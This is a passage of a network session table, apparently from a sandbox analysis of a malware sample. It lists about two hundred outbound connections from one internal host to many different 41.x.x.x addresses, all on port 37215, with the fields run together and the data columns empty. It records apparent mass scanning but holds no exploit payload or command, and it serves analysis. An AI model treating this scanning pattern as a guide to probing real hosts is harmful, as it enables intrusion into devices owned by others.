                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20960192.168.2.154834641.39.202.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20961192.168.2.155722241.34.160.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20962192.168.2.153482641.49.14.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20963192.168.2.154112841.255.240.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20964192.168.2.153335641.251.58.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20965192.168.2.153514641.47.123.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20966192.168.2.155692641.109.164.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20967192.168.2.155659841.71.229.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20968192.168.2.155653441.199.138.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20969192.168.2.155995641.227.180.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20970192.168.2.153931041.111.197.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20971192.168.2.154890641.241.164.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20972192.168.2.153987041.214.243.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20973192.168.2.154107441.89.212.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20974192.168.2.153535441.174.245.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20975192.168.2.155446041.186.33.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20976192.168.2.154838641.167.146.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20977192.168.2.154390241.230.115.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20978192.168.2.154282441.53.221.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20979192.168.2.154575041.79.94.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20980192.168.2.153590441.91.214.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20981192.168.2.153348641.90.135.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20982192.168.2.155596041.39.4.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20983192.168.2.154669841.19.234.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20984192.168.2.153318241.76.83.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20985192.168.2.153911641.185.52.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20986192.168.2.154173441.27.102.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20987192.168.2.153731641.241.106.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20988192.168.2.153611841.45.9.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20989192.168.2.155651241.180.10.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20990192.168.2.155087841.119.73.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20991192.168.2.154325641.243.124.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20992192.168.2.155929041.41.140.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20993192.168.2.155775241.61.8.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20994192.168.2.155789641.122.41.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20995192.168.2.154443441.61.119.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20996192.168.2.155789641.16.3.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20997192.168.2.155652641.199.24.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20998192.168.2.154013641.6.221.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20999192.168.2.154620041.25.199.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21000192.168.2.153948241.80.98.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21001192.168.2.155708641.169.33.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21002192.168.2.155872841.145.178.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21003192.168.2.155778641.85.247.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21004192.168.2.155790841.169.193.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21005192.168.2.153670641.195.198.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21006192.168.2.154975241.97.180.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21007192.168.2.154267841.14.230.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21008192.168.2.156020641.197.193.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21009192.168.2.154639441.70.0.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21010192.168.2.154025241.80.177.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21011192.168.2.155988041.21.3.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21012192.168.2.155771041.14.161.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21013192.168.2.154705241.2.21.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21014192.168.2.155303441.114.240.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21015192.168.2.155313441.254.50.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21016192.168.2.154001241.113.150.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21017192.168.2.153316441.16.151.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21018192.168.2.153847841.55.3.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21019192.168.2.153489241.83.112.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21020192.168.2.155141241.5.21.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21021192.168.2.156022841.25.95.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21022192.168.2.155640241.7.151.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21023192.168.2.155951641.246.160.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21024192.168.2.155987841.151.255.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21025192.168.2.155011641.168.95.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21026192.168.2.154049441.198.212.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21027192.168.2.153545841.144.22.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21028192.168.2.154834641.159.241.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21029192.168.2.153421041.59.101.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21030192.168.2.155574841.147.195.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21031192.168.2.153526441.151.53.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21032192.168.2.153886641.31.138.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21033192.168.2.154856641.162.201.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21034192.168.2.155123241.55.151.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21035192.168.2.155624241.151.16.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21036192.168.2.155722241.26.19.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21037192.168.2.155167241.102.195.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21038192.168.2.153474441.125.173.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21039192.168.2.155794041.127.13.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21040192.168.2.155710241.194.228.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21041192.168.2.156042441.132.254.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21042192.168.2.155964641.255.222.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21043192.168.2.154630041.147.166.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21044192.168.2.154657241.65.106.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21045192.168.2.154643441.111.173.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21046192.168.2.155949841.13.16.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21047192.168.2.154706041.141.98.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21048192.168.2.155031841.7.94.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21049192.168.2.153444841.182.137.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21050192.168.2.154722641.87.234.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21051192.168.2.155840641.234.249.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21052192.168.2.154646441.116.22.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21053192.168.2.154948041.68.96.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21054192.168.2.153390441.8.148.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21055192.168.2.155981041.243.236.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21056192.168.2.153671041.19.43.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21057192.168.2.155353841.141.54.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21058192.168.2.153533641.59.103.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21059192.168.2.154512041.138.83.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21060192.168.2.155703441.114.113.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21061192.168.2.155616841.249.225.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21062192.168.2.153710241.182.48.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21063192.168.2.155205641.111.242.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21064192.168.2.153647641.243.204.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21065192.168.2.155105241.125.105.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21066192.168.2.156096041.104.219.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21067192.168.2.155035441.130.170.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21068192.168.2.153421441.190.143.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21069192.168.2.154633641.130.206.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21070192.168.2.154810041.244.238.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21071192.168.2.155736241.180.247.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21072192.168.2.154854841.214.242.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21073192.168.2.155998641.17.116.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21074192.168.2.153372241.242.215.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21075192.168.2.154505241.255.215.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21076192.168.2.155300241.197.131.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21077192.168.2.155124841.221.31.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21078192.168.2.153844241.9.126.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21079192.168.2.154244241.196.87.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21080192.168.2.155450641.17.186.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21081192.168.2.154573441.111.140.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21082192.168.2.155896641.109.21.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21083192.168.2.153581641.53.133.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21084192.168.2.155537241.238.86.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21085192.168.2.155819441.242.194.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21086192.168.2.153413041.103.245.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21087192.168.2.154334641.61.221.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21088192.168.2.154866241.202.72.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21089192.168.2.155977041.71.251.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21090192.168.2.153547441.135.7.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21091192.168.2.153502041.64.236.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21092192.168.2.155718641.172.45.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21093192.168.2.154449241.77.69.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21094192.168.2.154061241.196.123.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21095192.168.2.154545441.180.59.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21096192.168.2.155997041.115.83.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21097192.168.2.155156841.86.100.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21098192.168.2.154658641.232.177.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21099192.168.2.153692041.115.52.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21100192.168.2.155387041.62.246.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21101192.168.2.156037241.74.179.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21102192.168.2.155141841.185.40.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21103192.168.2.153367641.98.195.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21104192.168.2.155765441.63.195.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21105192.168.2.155135441.15.188.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21106192.168.2.154753841.182.135.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21107192.168.2.155665041.249.215.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21108192.168.2.155794641.88.150.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21109192.168.2.154547441.105.39.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21110192.168.2.154522041.88.61.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21111192.168.2.154394241.79.15.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21112192.168.2.154104041.221.185.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21113192.168.2.155046841.49.10.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21114192.168.2.155226241.86.32.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21115192.168.2.153958241.87.145.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21116192.168.2.154808641.54.120.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21117192.168.2.153748641.41.23.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21118192.168.2.155804441.51.183.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21119192.168.2.153338041.164.206.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21120192.168.2.156023441.157.123.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21121192.168.2.156053441.151.202.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21122192.168.2.154428441.177.146.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21123192.168.2.155242441.182.254.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21124192.168.2.154786641.113.85.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21125192.168.2.154276241.160.146.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21126192.168.2.155461241.67.3.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21127192.168.2.155095041.91.109.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21128192.168.2.155155441.167.217.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21129192.168.2.154399441.32.106.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21130192.168.2.153567641.27.187.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21131192.168.2.153881841.56.37.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21132192.168.2.155722841.34.241.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21133192.168.2.154660441.126.236.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21134192.168.2.154142241.90.234.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21135192.168.2.154600841.70.51.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21136192.168.2.154742841.173.74.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21137192.168.2.153961641.9.69.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21138192.168.2.154587441.52.138.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21139192.168.2.155488641.238.209.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21140192.168.2.155903641.93.222.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21141192.168.2.155693041.14.2.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21142192.168.2.154584841.105.46.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21143192.168.2.153663841.216.119.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21144192.168.2.153806841.233.62.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21145192.168.2.153284041.8.172.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21146192.168.2.155461241.71.178.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21147192.168.2.153384241.60.174.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21148192.168.2.155975441.139.78.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21149192.168.2.153703041.86.41.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21150192.168.2.154056241.202.198.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21151192.168.2.153959641.99.228.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21152192.168.2.154571841.127.3.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21153192.168.2.153328241.61.33.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21154192.168.2.154414641.195.61.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21155192.168.2.153660641.223.14.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21156192.168.2.155517241.139.231.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21157192.168.2.153611641.208.27.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21158192.168.2.154963641.87.218.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21159192.168.2.154936441.96.80.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21160192.168.2.153523841.191.1.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21161192.168.2.155551641.89.247.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21162192.168.2.155311041.220.4.4337215
